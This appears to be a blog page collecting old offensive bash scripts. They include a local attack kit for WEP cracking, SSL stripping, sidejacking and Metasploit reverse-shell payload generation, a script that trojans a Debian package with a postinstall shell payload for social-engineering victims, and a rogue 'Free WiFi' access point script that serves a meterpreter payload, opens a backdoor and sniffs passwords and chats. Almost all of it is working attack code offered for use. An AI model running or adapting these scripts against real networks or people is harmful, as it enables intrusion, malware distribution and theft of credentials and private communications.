OPEXXX

aikido bash script

#!/bin/bash

#based on a script by I.Verges

#made by prowl3r

#declare arrays

declare -a WHITE_IPS

declare -a WHITE_MACS

#set here (known) white ips (include the router one). No need to include local IP.

WHITE_IPS=( “192.168.1.1” “192.168.1.2” “192.168.1.3” )

#set here (known)white macs.

WHITE_MACS=( “00:11:22:33:44:55” “22:33:44:55:66” )

#Network interface (eth0, wlan0, ra0)

DEVICE=”eth0”

#network mask (24=255.255.255.0, 16=255.255.0.0)

MASK=24

#help

for opt in $@; do

if [ “$opt” = “-h” ]; then

echo “”

echo “aikido dirty script by prowl3r for those bt4f paranoids”

echo “”

echo “Create the daemon: ‘crontab -e’ and then add the following line:”

echo “*/5 * * * * /path-to-aikido/aikido”

echo “(execute every 5 minutes)”

echo “”

echo “Start cron just for this session: /etc/init.d/cron start”

echo “update-rc.d cron defaults (to start cron at boot time)”

echo “”

echo “Dont forget to set execution rights and run as root. English lang required”

echo “”

echo “To remove, edit crontab and delete aikido line”

echo “”

echo “It looks for connected hosts and records IP (and MAC if available).”

echo “Then confirms it’s a known IP, otherwise it nmap it and prompts for further actions.”

echo “Please, add your interface as well as known IPs and MACs by editing the script.”

echo “”

echo “Use: ./aikido”

echo “Options:”

echo ” -h Show this help stuff”

exit

fi

done

#obtain local ip

ip=$(/sbin/ifconfig “$DEVICE” | grep “inet” | awk ‘{print $2}’ | cut -c 6-)

#add local ip to array

WHITE_IPS[${#WHITE_IPS[*]}]=$ip

#get connected hosts and save them in “-” file (standar output)

#redirected to HOST_IPS variable

HOST_IPS=$(/usr/bin/nmap -sP ${WHITE_IPS[0]}/$MASK -oG -)

#cut to get only valid ip format

IPS=$(echo “$HOST_IPS” | grep Host | cut -c 7-20 | tr -d “\()”)

#count lines in archive, or in other words, ips in archive

counter=$(echo “$IPS” | wc -l - | cut -c 1-2)

total=$(expr $counter - 1)

#allow access to X from crontab

export DISPLAY=:0

export XAUTHORITY=”$HOME/.Xauthority”

#search loop

var=0

while [ $var -le $total ]; do

SKIP_LOOP=0

let var=$var+1

#capture ip by line

adds=$(echo “$IPS” | sed -n “$var p”)

#remove spaces

adds=${adds/ /}

for i in ${WHITE_IPS[*]}

do

if [ “$i” == “$adds” ]; then

SKIP_LOOP=1

break

fi

done

if [ “$SKIP_LOOP” == “1” ]; then

continue

fi

#obtain and format mac

ARP=$(/usr/sbin/arp -a $adds)

if [ “$ARP” == “arp: in 1 entries no match found.” ]; then

MAC=”Not cached yet”

else

MAC=$(echo “$ARP” | awk ‘{print $4}’)

MAC=${MAC/ /}

fi

for i in ${WHITE_MACS[*]}

do

if [ “$i” == “$MAC” ]; then

SKIP_LOOP=1

break

fi

done

if [ “$SKIP_LOOP” == “1” ]; then

continue

fi

#warn about intruder

WARNING=$(echo `/bin/date —rfc-3339=seconds`” \n HOST: $adds \n ARP: $MAC”)

zenity —timeout 20 —title “aikido: Intruder detected” —question —text “$WARNING \n\n*** Is this a known host? *** \n\n .- OK: No action will be taken \n .- Cancel: Full scan and log details”

case $? in

5)

echo “$WARNING” » /root/aikido.log

echo “*** Logged due to dialog timeout / unattended computer ***” » /root/aikido.log

echo “—————————————- x —————————————-” » /root/aikido.log;;

0)

zenity —title “aikido: Known/safe IP notification” —info —text “\n\nPlease add $adds to the whitelist by manually editing the aikido script, otherwise alerts will keep popping up at crontab execution.”;;

1)

SCAN=$(/usr/bin/nmap -A -T5 $adds)

echo “$WARNING” » /root/aikido.log

echo “$SCAN” » /root/aikido.log

echo “—————————————- x —————————————-” » /root/aikido.log

zenity —width 400 —title “aikido: Preliminary actions taken” —info —text “Host and port/services scan details logged at /root/aikido.log \n\n$WARNING \n\n$SCAN”

a=”Nah, I’ll take care myself (keep alert showing)”

b=”Try to autopwn using fast-track”

c=”Block this host with iptables”

d=”Capture tcpdump session for this host”

OPTION=$(zenity —width 380 —height 230 —title “aikido: Countermeasures” —list —text “Now for the fun part. What you wanna do?” —radiolist —column “Pick” —column “Action” TRUE “Nah, I’ll take care myself (keep alert showing)” FALSE “Try to autopwn using fast-track” FALSE “Block this host with iptables” FALSE “Capture tcpdump session for this host”)

case $OPTION in

$a) continue;;

$b) /opt/kde3/bin/konsole —vt_sz 80x40 -noclose —workdir /pentest/exploits/fasttrack/ -e sh -c ” python fast-track.py -c 2 $adds -r “;;

$c) tables=$(/sbin/iptables -A INPUT -s $adds -j DROP)

blocked=$(/sbin/iptables -L)

zenity —title “aikido: Blocked host notification” —info —text “$blocked”;;

$d) /usr/sbin/tcpdump -i $DEVICE host $adds -s 1500 -w /root/$adds.pcap &

zenity —title “aikido: Recording activity for host $adds” —info —text “\n\n *** To stop tcpdump recording, just press OK *** \n\n(Use the following command to replay: \n\ntcpdump -r /root/$adds.pcap)”

killall -9 tcpdump;;

esac;;

esac

done

Jun 11

LAK

#!/bin/sh

autonmap() {
clear
cat <<EOF
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------'        
EOF
OS=`uname`
IO="" # store IP
case $OS in
Linux) IP=`ip route show  | grep 'via'| awk '{ print $3}'`;;
*) IP="Unknown";;
esac
echo "Scanning $IP/24 This Could Take Some Time"

nmap -PN -O -sV  $IP/24 -p 0-65535 --open  -oN report
}
Windowsx86() {
clear
cat << EOF 

Please Select A Payload:

windows/meterpreter/bind_ipv6_tcp                Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_tcp                     Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/find_tag                     Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
windows/meterpreter/reverse_ipv6_tcp             Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_tcp                  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/shell/bind_tcp                           Windows Command Shell, Bind TCP Stager
windows/shell/find_tag                           Windows Command Shell, Find Tag Ordinal Stager
windows/shell/reverse_ipv6_tcp                   Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_tcp                        Windows Command Shell, Reverse TCP Stager
windows/shell_bind_tcp                           Windows Command Shell, Bind TCP Inline
windows/shell_bind_tcp_xpfw                      Windows Disable Windows ICF, Command Shell, Bind TCP Inline
windows/shell_reverse_tcp                        Windows Command Shell, Reverse TCP Inline
windows/vncinject/bind_ipv6_tcp                  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_tcp                       VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/find_tag                       VNC Server (Reflective Injection), Find Tag Ordinal Stager
windows/vncinject/reverse_ipv6_tcp               VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_tcp                    VNC Server (Reflective Injection), Reverse TCP Stager



EOF
echo -n "LAK>"
read List
clear
cat << EOF

Please Select A Encoder:
 
x86/alpha_mixed            Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper            Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower     Avoid UTF8/tolower
x86/call4_dword_xor        Call+4 Dword XOR Encoder
x86/countdown              Single-byte XOR Countdown Encoder
x86/fnstenv_mov            Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive      Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha               Non-Alpha Encoder
x86/nonupper               Non-Upper Encoder
x86/shikata_ga_nai         Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed          Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper          Alpha2 Alphanumeric Unicode Uppercase Encoder

EOF

echo -n "LAK>"
read A
clear
echo -n "Please enter your ip: "
echo 
echo -n "LAK>"
read ip
clear
echo -n "Pleas enter port: "
echo 
echo -n "LAK>"
read port
echo 
echo -n "Please Wait While Payload is Generated...."
clear
sleep 1
msfpayload windows/shell/reverse_tcp  LHOST=$ip LPORT=$port ENCODING=$A X > /root/out.exe

msfcli exploit/multi/handler PAYLOAD=$List LHOST=$ip LPORT=$port ENCODING=$A E  

}

Windowsx64() {
clear
 cat << EOF 
Please Select A Payload:
    
windows/x64/exec                        Execute Command
windows/x64/meterpreter/bind_tcp        Meterpreter,Bind TCP Stager
windows/x64/meterpreter/reverse_tcp     Meterpreter,Reverse TCP Stager
windows/x64/shell/bind_tcp              Command Shell,Bind TCP Stager
windows/x64/shell/reverse_tcp           Command Shell,Reverse TCP Stager
windows/x64/shell_bind_tcp              Command Shell,Bind TCP Inline
windows/x64/shell_reverse_tcp           Command Shell,Reverse TCP Inline
 

EOF
echo -n "LAK>"
read List
clear
cat << EOF

Please Select A Encoder:
 
x86/alpha_mixed            Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper            Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower     Avoid UTF8/tolower
x86/call4_dword_xor        Call+4 Dword XOR Encoder
x86/countdown              Single-byte XOR Countdown Encoder
x86/fnstenv_mov            Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive      Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha               Non-Alpha Encoder
x86/nonupper               Non-Upper Encoder
x86/shikata_ga_nai         Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed          Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper          Alpha2 Alphanumeric Unicode Uppercase Encoder

EOF
echo -n "LAK>"
read A
clear
echo -n "Please enter your ip: "
echo 
echo -n "LAK>"
read ip
clear
echo -n "Pleas enter port: "
echo 
echo -n "LAK>"
read port
echo 
echo -n "Please Wait While Payload is Being Generated...."
clear
sleep 1
msfpayload windows/x64/shell/reverse_tcp  LHOST=$ip LPORT=$port ENCODING=$A X > /root/out.exe

msfcli exploit/multi/handler PAYLOAD=$List LHOST=$ip LPORT=$port ENCODING=$A E  

}

menu12() {
clear
cat << EOF
      
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 

EOF


           echo "   Please Select A Payload Type"
        echo
        echo "      1. Windowsx64"
        echo "      2. Windowsx86"
        echo "      3. Exit"
        echo 
        echo
        echo -n "LAK>"
   


}
loop() {

   while true
   do
   menu12
   read answer
   case $answer in
   1)
       Windowsx64
  ;;   
   2)
      Windowsx86
  ;;
   3)
      exit
  ;;
   *)
      loop
  ;;
   esac
   done
}





case "$1" in
    help)
   helploop
  ;;

    file)
      filoop
   ;;
   
    text)
   procloop
  ;;

   status)
   statloop
  ;;      

    *)
   helploop
  ;;
esac



wepcracker() {
macspoof() {
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo -n "Please Enter Mac Address You Would Like To Spoof: "
read spoof
ifconfig $DEVICE down
macchanger -m $spoof $DEVICE
clear 
ifconfig  $DEVICE up
echo "Your New Mac Address is $spoof"
} 

korekchopchop() { 
clear
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo "Spoofing Mac Address New Mac $mac"
ifconfig $DEVICE down
macchanger -m $mac $DEVICE
clear
ifconfig $DEVICE up 
echo "Scanning For Access Points"
xterm -e airodump-ng -w out --encrypt WEP $DEVICE &
sleep 10 

killall xterm 
case $OS in
   Linux) bssid=`cat out-01.csv |grep WEP |awk '{print $1} ' |cut -d "," -f 1`;;
   *) bssid="Unknown";;
esac
clear
echo $bssid
echo -n "Please Enter Bssid: "
read bss
case $OS in
   Linux) channel=`cat out-01.csv |grep "$bss" |awk '{print $6} ' |cut -d "," -f 1  `;;
   *) channel="Unknown";;
esac
airodump-ng -c $channel -w wep --ivs --bssid $bss $DEVICE &
xterm -e aireplay-ng -1 0 -a $bss -h $mac $DEVICE &
xterm -e aireplay-ng -4 -b $bss -h $mac  $DEVICE 
xterm -e packetforge-ng -0 -a $bss -h $mac -k 255.255.255.255 -l 255.255.255.255 -y replay*.xor -w /root/frag 
xterm -e aireplay-ng -2 -r frag -h $mac $DEVICE &
sleep 10 
xterm -e aircrack-ng wep*.ivs -l key 
killall xterm
killall airodump-ng 
rm out*
rm wep-0*
rm replay_*
rm frag
}

framentation() {
clear
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo "Spoofing Mac Address New Mac $mac"
ifconfig $DEVICE down
macchanger -m $mac $DEVICE
clear
ifconfig $DEVICE up 
echo "Scanning For Access Points"
xterm -e airodump-ng -w out --encrypt WEP $DEVICE &
sleep 10 

killall xterm 
case $OS in
   Linux) bssid=`cat out-01.csv |grep WEP |awk '{print $1} ' |cut -d "," -f 1`;;
   *) bssid="Unknown";;
esac
clear
echo $bssid
echo -n "Please Enter Bssid: "
read bss
case $OS in
   Linux) channel=`cat out-01.csv |grep "$bss" |awk '{print $6} ' |cut -d "," -f 1  `;;
   *) channel="Unknown";;
esac
airodump-ng -c $channel -w wep --ivs --bssid $bss $DEVICE &
xterm  -e aireplay-ng -1 0 -a $bss -h $mac $DEVICE &
xterm  -e aireplay-ng -5 -b $bss -h $mac  $DEVICE 
xterm  -e packetforge-ng -0 -a $bss -h $mac -k 255.255.255.255 -l 255.255.255.255 -y fragment*.xor -w frag 
xterm  -e aireplay-ng -2 -r frag -h $mac $DEVICE
sleep 10 
xterm -e aircrack-ng wep*.ivs -l key 
killall xterm
killall airodump-ng 
rm out*
rm wep-0*
rm replay_*
rm frag
}

injectiontest() {
clear
OS=`uname`
IO="" 
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
aireplay-ng -9 $DEVICE
}

client0841() {
clear
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo "Spoofing Mac Address New Mac $mac"
ifconfig $DEVICE down
macchanger -m $mac $DEVICE
clear
ifconfig $DEVICE up 
echo "Scanning For Access Points"
xterm -e airodump-ng -w out --encrypt WEP $DEVICE &
sleep 10 

killall xterm 
case $OS in
   Linux) bssid=`cat out-01.csv |grep WEP |awk '{print $1} ' |cut -d "," -f 1`;;
   *) bssid="Unknown";;
esac
clear
echo $bssid
echo -n "Please Enter Bssid: "
read bss
case $OS in
   Linux) channel=`cat out-01.csv |grep "$bss" |awk '{print $6} ' |cut -d "," -f 1  `;;
   *) channel="Unknown";;
esac
airodump-ng -c $channel -w wep --ivs --bssid $bss $DEVICE &
xterm -e aireplay-ng -1 0 -a $bss -h $mac $DEVICE &
xterm -e aireplay-ng -2 -b $bss -t 1 -d FF:FF:FF:FF:FF:FF  -h $mac $DEVICE.&
sleep 10 
xterm -e aircrack-ng wep*.ivs -l key 
killall xterm
killall airodump-ng
rm out* 
rm wep-0*
rm replay_*
}



arpreplay() { 
clear
OS=`uname`
IO="" 
mac='00:11:22:33:44:55'
case $OS in
   Linux) DEVICE=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) DEVICE="Unknown";;
esac
echo "Spoofing Mac Address New Mac $mac"
ifconfig $DEVICE down
macchanger -m $mac $DEVICE
clear
ifconfig $DEVICE up 
echo "Scanning For Access Points"
xterm -e airodump-ng -w out --encrypt WEP $DEVICE &
sleep 10 

killall xterm 
case $OS in
   Linux) bssid=`cat out-01.csv |grep WEP |awk '{print $1} ' |cut -d "," -f 1`;;
   *) bssid="Unknown";;
esac
clear
echo $bssid
echo -n "Please Enter Bssid: "
read bss
case $OS in
   Linux) channel=`cat out-01.csv |grep "$bss" |awk '{print $6} ' |cut -d "," -f 1  `;;
   *) channel="Unknown";;
esac
airodump-ng -c $channel -w wep --ivs --bssid $bss $DEVICE &
xterm -e aireplay-ng -1 0 -a $bss -h $mac $DEVICE &
xterm -e aireplay-ng -3 -b $bss -h $mac $DEVICE &
sleep 10 
xterm -e aircrack-ng wep*.ivs -l key 
killall xterm
killall airodump-ng 
rm out*
rm wep-0*
rm replay_*
}

menu1() {
   clear
tput setaf 9; cat << EOF
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------'        
            
EOF
   
echo "   Please Select A Type Of Attack"
echo
echo "      1. Client Based Arp Replay"
echo "      2. Client Based 0841"
echo "      3. Clientless Fragmentation"
echo "      4. Clientless Korek Chop Chop"
echo "      5  Injection Test"
echo "      6. Spoof Mac Address"
echo "      7. Exit"
echo
echo -n "     LAK>"
}
menu2() {

   while true
   do
   menu1
   read answer
   case $answer in
   1)
      arpreplay
  ;;   
   2)
      client0841
  ;;
   3)
      framentation
  ;;
   4)
      korekchopchop  
  ;;
   5)
      injectiontest
  ;;
   6)
    macspoof
  ;;
   7)
    exit
  ;;
   *)
     menu2
  ;;
   esac
   done
}

case "$1" in
    help)
   menu2
  ;;     

    *)
   menu2
  ;;
esac
}
sslsniff() {
clear
cat << EOF
 
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 

EOF
OS=`uname`
IO="" 
case $OS in
   Linux) iface=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) iface="Unknown";;
esac
OS=`uname`
IO="" 
case $OS in
   Linux) tdg=`ip route show |grep "via" | awk  '{print $3}'`;;
   *) tdg="Unknown";;
esac
echo -n "Please Enter Target Ip To Sniff: "
read tip
clear
cat << EOF
 
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 
EOF

echo "The selected interface is $iface"
echo "The target gateway is $tdg"
echo "Starting....."
sleep 2 
clear
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
xterm -e arpspoof -i $iface -t $tip $tdg &
xterm -e  python /pentest/web/sslstrip/sslstrip.py -a -l 8080 &
clear
ettercap -T -q -i $iface -M arp:remote /$tip/ /$tdg/

}

sidejack() {
clear
cat << EOF
 
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 

EOF
echo -n "Please Set Proxy to http://127.0.0.1 on port 1234 in firefox"
echo
sleep 5 
echo 
OS=`uname`
IO="" 
case $OS in
   Linux) iface=`ifconfig -a | grep  "wlan*" | awk  '{print $1}'`;;
   *) iface="Unknown";;
esac 
/pentest/sniffers/hamster/ferret -i $iface & 
xterm -e /pentest/sniffers/hamster/hamster 
killall hamster
killall ferret
}
menu1(){
clear
cat << EOF
       .----------------.  .----------------.  .----------------. 
      | .--------------. || .--------------. || .--------------. |
      | |   _____      | || |      __      | || |  ___  ____   | |
      | |  |_   _|     | || |     /  \     | || | |_  ||_  _|  | |
      | |    | |       | || |    / /\ \    | || |   | |_/ /    | |
      | |    | |   _   | || |   / ____ \   | || |   |  __'.    | |
      | |   _| |__/ |  | || | _/ /    \ \_ | || |  _| |  \ \_  | |
      | |  |________|  | || ||____|  |____|| || | |____||____| | |
      | |              | || |              | || |              | |
      | '--------------' || '--------------' || '--------------' |
       '----------------'  '----------------'  '----------------' 
                           
Local Attack Kit Main Menu :                            

     1. WEP Cracking
     2. WPA Cracking
     3. SSL Sniffing
     4. Side Jacking
     5. AutoNmap
     6. PayloadGen
     7. Exit
EOF
echo 
echo 
echo -n "     LAK>"
}
menu2() {

   while true
   do
   menu1
   read answer
   case $answer in
   1)
      wepcracker
  ;;   
   2)
      wpacracker
  ;;
   3)
      sslsniff
  ;;
   4)
      sidejack  
  ;;
   5)
      autonmap
  ;;
   6)
    loop
  ;;
   7)
  exit
  ;;
   *)
     menu2
  ;;
   esac
   done
}
case "$1" in
    help)
   menu2
  ;;

    file)
      filoop
   ;;
   
    text)
   procloop
  ;;

   status)
   statloop
  ;;      

    *)
   menu2
  ;;
esac

bash script to generate a Debian (.deb) package trojan using Metasploit payload

#!/bin/bash

# bash script to generate a Debian (.deb) package trojan using Metasploit payload
# Author:  Aaron Hine - @redmeat_uk
# Date: 31-01-2010

# Disclaimer: this script should be used for educational purposes.  You should obtain permission before running this against an indvidual or company.  
# The author is not liable for any illegal use of this script.

scriptname=`basename "$0"`

  if [[ $UID -ne 0 ]]; then
     echo "${scriptname} must be run as root"
     exit 1
  fi

# 
echo
echo "#####################################################################"
echo "Script to generate a Debian package trojan using a Metasploit payload"
echo "#####################################################################"
echo 

# change these vars to suit your needs
msfdir="/opt/metasploit3/msf3"
tmpdir="/tmp/evildeb"
workdir="$tmpdir/work"

# prompt for package name and setup dirs
echo "Please enter the name of the APT package you wish to trojan:"
echo "Use apt-cache search <package> for ideas :)"
echo
read package
apt-get --download-only install $package
echo
mkdir $tmpdir
mkdir $workdir
mv /var/cache/apt/archives/$package* $tmpdir
mkdir $workdir/DEBIAN
dpkg -x $tmpdir/$package* $workdir
apt-cache show $package > $workdir/DEBIAN/control
cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control2
mv $workdir/DEBIAN/control2 $workdir/DEBIAN/control
echo
echo "Please choose your Metasploit payload"
echo "-------------------------------------"
echo 
echo "1. bind tcp"
echo "2. reverse tcp"
echo
echo "press number and hit return:"
read choice


if [ "$choice" -eq 1 ]; then
        payload="linux/x86/shell/bind_tcp"
                echo "Enter IP:"
                read rhostIP
                echo "Enter port:"
                read bindport
                options="RHOST=$rhostIP LPORT=$bindport"
else
        if [ "$choice" -eq 2 ]; then
                payload="linux/x86/shell/reverse_tcp"
                echo "Enter IP:"
                read lhostIP
                echo "Enter port:"
                read revport
                options="LHOST=$lhostIP LPORT=$revport" 
        fi
fi

echo
echo "Please enter the filename for the Metasploit payload:"
read filename
echo

cd $workdir
binary=`find . -executable -type f | grep $package | sed -e 's/^.//'`
trojan="$filename"

echo "Making post-install script..."
echo

echo "#!/bin/sh" > $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "" >> $workdir/DEBIAN/postinst
echo "sudo chmod 2755 $binary$trojan && $binary$trojan & $binary &" >> $workdir/DEBIAN/postinst

trojan2=`echo $binary$trojan | sed -e 's/^\///'`

echo "Thanks - generating your payload..."
$msfdir/msfpayload $payload $options X > $workdir/$trojan2
echo

cd $workdir/DEBIAN
chmod 755 postinst
dpkg-deb --build $workdir
cd $tmpdir

echo
echo "Please enter your webroot directory:"
read webroot
mv $tmpdir/work.deb $webroot/$package.deb
rm -rf $tmpdir

echo
echo "Trojan'd $package.deb created and placed in $webroot"
echo

webserver="python -m SimpleHTTPServer 80"

echo "Would you like a Python webserver ? (y/n) :"
read svr
echo

if [[ "$svr" == "y" || "$svr" == "Y" ]]; then
        cd $webroot
        $webserver & 
        echo
        else
           echo "Fair nuff, setup your own webserver :)"
           echo
fi

sleep 1

echo "Would you like me to setup a metasploit handler ? (y/n) :"
echo
read handler
echo
echo "In the meantime, social engineer your victim in to browsing to your package"
echo "and get them to install it and wait for your root shell >)"
echo

if [[ "$handler" == "y" || "$handler" == "Y" ]]; then
        echo
        $msfdir/msfcli exploit/multi/handler payload=$payload $options E
        else
                echo "Fair nuff, setup your own handler :)"
                echo
fi

Jun 09

FakeAP_pwn.sh

#! /bin/bash

# (C)opyright 2009 - g0tmi1k

#

# FakeAP_pwn.sh

# Settings

export gatewayip=192.168.1.1

export internet_interface=wlan0

export fakeap_interface=wlan1

echo “[>] Starting: FakeAP_pwn - g0tmi1k”

# FakeAP

echo “[+] Setting up FakeAP”

modprobe tun

xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -P -C 30 -e “Free WiFi” $fakeap_interface -v&

sleep 2

# Tables

echo “[+] Setting up forwarding tables…”

ifconfig lo up

ifconfig at0 up

ifconfig at0 10.0.0.1 netmask 255.255.255.0

ifconfig at0 mtu 1400

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

iptables —flush

iptables —table nat —flush

iptables —delete-chain

iptables —table nat —delete-chain

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p udp -j DNAT —to $gatewayip

#iptables -P FORWARD ACCEPT

iptables —append FORWARD —in-interface at0 -j ACCEPT

iptables —table nat —append POSTROUTING —out-interface $internet_interface -j MASQUERADE

# DHCP

echo “[+] Setting up DHCP server…”

xterm -geometry 75x25+1+100 -T DHCP -e dhcpd3 -d -f -cf /root/FakeAP_pwn/dhcpd.conf at0&

sleep 2

# Need the user to come here

echo “[+] Start web server…”

#xterm -geometry 75x25+1+200 -T WebServer -e sh -c “start-apache”&

xterm -geometry 75x25+1+200 -T WebServer -e /etc/init.d/apache2 start

sleep 2

# So lets force them!

echo “[+] Force user to vist our site…”

iptables -t nat -A PREROUTING -p tcp —dport 80 -j DNAT —to 10.0.0.1

# Bad boy stuff!

echo “[+] Here comes metasploit…”

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/MS016455.exe

echo “[+] Uploading SBD…”

xterm -geometry 75x25+1+300 -T Metasploit -e ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 AutoRunScript=/root/FakeAP_pwn/fakeap_pwn.rb E&

sleep 2

# upload //root/FakeAP_pwn/ C:/

# execute -f “C:/sbdbg.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1”

#./msfconsole -r /root/FakeAP_pwn/fakeap_pwn.rc

# Wait till user is connected

rm -r /tmp/FakeAP_pwn.tmp

echo “[-] Waitng for target to connect…”

while [ ! -e /tmp/FakeAP_pwn.tmp ]; do

sleep 1

done

# They give us access to their system, so lets give them internet back ;)

echo “[+] Give them (our) internet back…”

route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

iptables —flush

iptables —table nat —flush

iptables —delete-chain

iptables —table nat —delete-chain

iptables -t nat -A PREROUTING -p udp -j DNAT —to $gatewayip

#iptables -P FORWARD ACCEPT

iptables —append FORWARD —in-interface at0 -j ACCEPT

iptables —table nat —append POSTROUTING —out-interface $internet_interface -j MASQUERADE

# Lets connect! =)

# *** If FakeAP_pwn.rb upload bit is edited, you could replace the line below with VNC! ***

echo “[+] Lets us back in…”

konsole -T BackDoor -e sbd -l -k g0tmi1k -p 7332&

sleep 2

# Get as much info as poss!

echo “[+] Watch what they do…”

# URLs

xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i wlan0&

# Passwords

xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i wlan0&

# IM Chats

xterm -geometry 100x10+470+300 -T “IM Chat” -e msgsnarf -i wlan0&

echo

echo “[+] DONE - Have you, g0tmi1k?”

# Lets get some stuff from metasploit whistle we are at it!

#sysinfo

#getuid

